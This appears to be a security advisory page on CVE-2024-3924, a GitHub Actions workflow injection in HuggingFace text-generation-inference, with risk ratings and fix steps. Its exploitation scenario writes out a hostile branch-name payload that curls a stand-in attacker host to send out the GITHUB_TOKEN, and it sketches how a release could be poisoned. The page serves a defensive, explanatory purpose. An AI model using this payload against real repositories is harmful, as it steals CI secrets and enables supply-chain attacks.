AI Threat Alert AI Threat Alert

CVE-2024-3924: text-generation-inference: workflow injection RCE

UNKNOWN CISA: TRACK*
Published May 30, 2024
CISO Take

A GitHub Actions workflow in HuggingFace TGI uses the PR branch name (`github.head_ref`) unsanitized in a shell command, letting any external contributor execute arbitrary code on the CI runner by naming their branch as a payload. If your team uses TGI or forks of it, verify you're running a version past the fix commit (88702d8) and audit your own workflows for similar `github.head_ref` misuse. The real risk is supply chain: a compromised runner can exfiltrate repo secrets, inject malicious artifacts, or backdoor releases.

Risk Assessment

Risk is HIGH for maintainers and contributors of TGI and any downstream forks. Exploitation requires only the ability to open a pull request — no repository write access needed. The affected workflow runs on `pull_request_target` context (implied by the vulnerability pattern), granting the runner access to repository secrets. For end-users who only consume published TGI releases, risk is indirect but real if the CI pipeline was exploited to poison a release artifact before the patch.

Severity & Risk

CVSS 3.1
N/A
EPSS
0.4%
chance of exploitation in 30 days
Higher than 59% of all CVEs
Source: EPSS v3 — FIRST.org
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Recommended Action

5 steps

  1. Patch

    Ensure TGI >= post-commit 88702d8 (v2.0.0 fix). Verify using git log --oneline | grep 88702d8 in your fork.

  2. Audit workflows

    Grep all .github/workflows/*.yml files for unquoted ${{ github.head_ref }}, ${{ github.event.pull_request.head.ref }}, or similar user-controlled inputs used in run: steps.

  3. Replace with safe alternatives

    Use ${{ github.base_ref }} where applicable, or sanitize via env: variable assignment before shell use.

  4. Restrict pull_request_target

    Limit secrets access for workflows triggered by external PRs. Use pull_request (no secret access) instead of pull_request_target unless required.

  5. Verify release integrity

    Check SHA/digest of TGI images/packages against official Hugging Face releases to detect any potential tampering during the vulnerability window (before May 2024 fix).

CISA SSVC Assessment

Decision Track*
Exploitation poc
Automatable No
Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Supply Chain Code Execution Framework Inference AML.T0010.001 AML.T0050 AML.T0055 AML.T0079

Compliance Impact

This CVE is relevant to:

EU AI Act
Art. 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.2 - AI system supply chain
NIST AI RMF
GOVERN 6.1 - AI risk in the supply chain
OWASP LLM Top 10
LLM05 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2024-3924?

A GitHub Actions workflow in HuggingFace TGI uses the PR branch name (`github.head_ref`) unsanitized in a shell command, letting any external contributor execute arbitrary code on the CI runner by naming their branch as a payload. If your team uses TGI or forks of it, verify you're running a version past the fix commit (88702d8) and audit your own workflows for similar `github.head_ref` misuse. The real risk is supply chain: a compromised runner can exfiltrate repo secrets, inject malicious artifacts, or backdoor releases.

Is CVE-2024-3924 actively exploited?

No confirmed active exploitation of CVE-2024-3924 has been reported, but organizations should still patch proactively.

How to fix CVE-2024-3924?

1. **Patch**: Ensure TGI >= post-commit 88702d8 (v2.0.0 fix). Verify using `git log --oneline | grep 88702d8` in your fork. 2. **Audit workflows**: Grep all `.github/workflows/*.yml` files for unquoted `${{ github.head_ref }}`, `${{ github.event.pull_request.head.ref }}`, or similar user-controlled inputs used in `run:` steps. 3. **Replace with safe alternatives**: Use `${{ github.base_ref }}` where applicable, or sanitize via `env:` variable assignment before shell use. 4. **Restrict pull_request_target**: Limit secrets access for workflows triggered by external PRs. Use `pull_request` (no secret access) instead of `pull_request_target` unless required. 5. **Verify release integrity**: Check SHA/digest of TGI images/packages against official Hugging Face releases to detect any potential tampering during the vulnerability window (before May 2024 fix).

What systems are affected by CVE-2024-3924?

This vulnerability affects the following AI/ML architecture patterns: LLM inference serving, CI/CD pipelines for AI frameworks, Model serving infrastructure, Self-hosted HuggingFace TGI deployments.

What is the CVSS score for CVE-2024-3924?

No CVSS score has been assigned yet.

Technical Details

NVD Description

A code injection vulnerability exists in the huggingface/text-generation-inference repository, specifically within the `autodocs.yml` workflow file. The vulnerability arises from the insecure handling of the `github.head_ref` user input, which is used to dynamically construct a command for installing a software package. An attacker can exploit this by forking the repository, creating a branch with a malicious payload as the name, and then opening a pull request to the base repository. Successful exploitation could lead to arbitrary code execution within the context of the GitHub Actions runner. This issue affects versions up to and including v2.0.0 and was fixed in version 2.0.0.

Exploitation Scenario

An adversary targeting an organization's LLM inference infrastructure forks `huggingface/text-generation-inference`. They create a branch named `$(curl -s https://attacker.com/exfil?token=$GITHUB_TOKEN)` or a more complex payload embedding reverse shell code. They open a pull request from this branch to the upstream repo. GitHub Actions triggers the `autodocs.yml` workflow on the PR, which constructs a `pip install` or similar command interpolating the raw branch name — executing the attacker's payload in the runner context. The runner, having access to repository secrets (PyPI tokens, signing keys, HuggingFace Hub credentials), exfiltrates them. The attacker then uses stolen credentials to publish a trojanized TGI release to PyPI or the Docker Hub, which propagates to every organization that auto-updates their LLM serving infrastructure.

Weaknesses (CWE)

CWE-94

References

Timeline

Published
May 30, 2024
Last Modified
November 21, 2024
First Seen
May 30, 2024

Related Vulnerabilities

CRITICAL CVE-2025-59528 10.0

Flowise: Unauthenticated RCE via MCP config injection

Same attack type: Supply Chain
CRITICAL CVE-2024-2912 10.0

BentoML: RCE via insecure deserialization (CVSS 10)

Same attack type: Supply Chain
CRITICAL CVE-2023-3765 10.0

MLflow: path traversal allows arbitrary file read

Same attack type: Supply Chain
CRITICAL CVE-2025-5120 10.0

smolagents: sandbox escape enables unauthenticated RCE

Same attack type: Supply Chain
CRITICAL CVE-2026-21858 10.0

n8n: Input Validation flaw enables exploitation

Same attack type: Code Execution
Back to Threat Feed